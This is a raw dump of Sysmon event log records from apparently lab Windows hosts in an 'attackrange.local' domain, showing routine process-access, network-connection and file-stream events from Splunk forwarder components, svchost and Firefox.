Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000808367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000808365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.144{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.732{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51085-false10.0.1.12-8000- 23542300x80000000000000001050412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:29.709{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2480E1FAFEBA6734BF69F5C5B974E8C9,SHA256=BAE6E5FBA8AAD41EFD0EB6815858B856CE63AE2EB1357D146D5DEC93AE62AF45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9282D17BC67512D9C265E41FAB7C37,SHA256=481BC2C1E315748DB3C0DE27E8DB11181896915912E5CC1340C90487F875C13E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F945B340F71B8C058DCE02A63120334A,SHA256=836140FC0B736ED523525E9DB1D507B0DA7A56E5920898BE24F0A5E0BA61047E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:30.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2479304D5E3C75A24537A94556817B9D,SHA256=45D6181768608EC77587AEBAE05E3483ECDA51918C485EAA651668F79446455A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:30.724{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4E4EE040495334A997345815BEC54A,SHA256=E322234A96C07D9E769368038A1E7EC2416E457F12D3D11F98577693E267A2BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57320-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:30.128{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B3BA1D26A7004439F6116F0E85CA0A50,SHA256=53EB2EAF6C6C3716CD6F8B9D9055D328D0C9E057A843F7C5AE0D619209FA51C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:31.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA8737F0F0BF7B0C2EE4ABB7D7DC1770,SHA256=EE083DEF88E7EC44F893AF340F29244A1327B32CDF485D09A2ED642FC2C52C7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:31.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3715324644267AF4821933286E9EE0CE,SHA256=E7B34A6AE046494B400D0676E7D7573AC4D5FD8DAA500D1843BD97F08F6A52DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:32.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E46C567A86AE5D5A29499EDA5A12A990,SHA256=9177EF7BA7B5BBD477D2CE1DAF54B5FC1616A918BFE214E7DD05C91A01112ACD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.527{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse184.105.247.196scan-15.shadowserver.org40306-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE835E63D94C68B47CE003245BF5CD5,SHA256=BE15ED923C8D36F89E026621C11E150F468404E689D704F4446FBA7F1B3E73AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:33.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D4E0A261FB9253608ED63330DFFCA14,SHA256=851137E06EB36FEA2B0150053938921717768E1A7349A0804BD990F9D2629F09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51086-false10.0.1.12-8000- 23542300x80000000000000001050427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68C3560687899EB418A2EBC68665531A,SHA256=B5ACA730EB1D2D9F49B2A7685C77242762AA08EA65CE13449A40041F5570976A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=33E23D96CE607BE152EFD83B82ADF424,SHA256=6D712170AD9C5E89B201A8C93963C8F55AB2A5214A27D7E0DE4983B3FEC9835C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3EC8647AC9882DCFAE2BC6F8EC17B538,SHA256=6F666A316EDC558C8116085928BFF9DD73D734D4DD731F041F4833A72F92D834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3A0500DBA341EF53373EF424ABCD8E8D,SHA256=2102A5A21669384032D0DA4CB28C91550B73B23D2C458D388EA1B2C7BB11B99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E30F09FFD6267FC94F0559DA92A57F92,SHA256=BF6D7CE80EEE34F6CD8A1C2FABF676669E7E2DBA2FF4D900E0529E56A4F7C9C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=44412CD4A53B2FB4712437ED18DAE74F,SHA256=B7906D991B2CF9523B9849787B8245A0858350C8052A059CE9ACD477450CADA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=27DA64B7B254914428BA483604C72830,SHA256=A57AD32C7DE888ECD2BC287A0F4ED7DBEA464FCBB463CF7CC824A779E467CEB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2319ED50746ED330895CE94CB67E6769,SHA256=D3F6F64CE8FCA30210B14123264182AFFB6DA46F32917A082E2F625D9EAC9DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=625C904D3F729C15826F1F5ADD9D50A0,SHA256=7FB5FEA846B842001D7AE7640B71A1D851EC6A54D5BD96A55CF27E4478F428E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4C541547BC4548292461DC76A7186746,SHA256=53C6A9A2AE0622EA3D38C49CDAA5A4E0B62BBC9CA4F3B42CD9F5A74F99D4D056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=333A39B5440B7FCDA5F4772A29C50123,SHA256=6CB16B7EF50982B3B289542C8D358EE179594BBA34E6E5A0EF6E853DC5CDEEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:34.786{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2959F333630D65311EBC18F1BF41E7,SHA256=42680BB5F79D1C13C446FB87DC2CA5993FD1460A8BA2154122878F8F3BA6D083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:34.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E77D0D3FD1F64920EC8F2C21139E1D,SHA256=3385B7D4C7EDF73DCB394DC8BE7A88D6671F3BD6965E33BACC702F8B278E9398,IMPHASH=00000000000000000000000000000000falsetrue 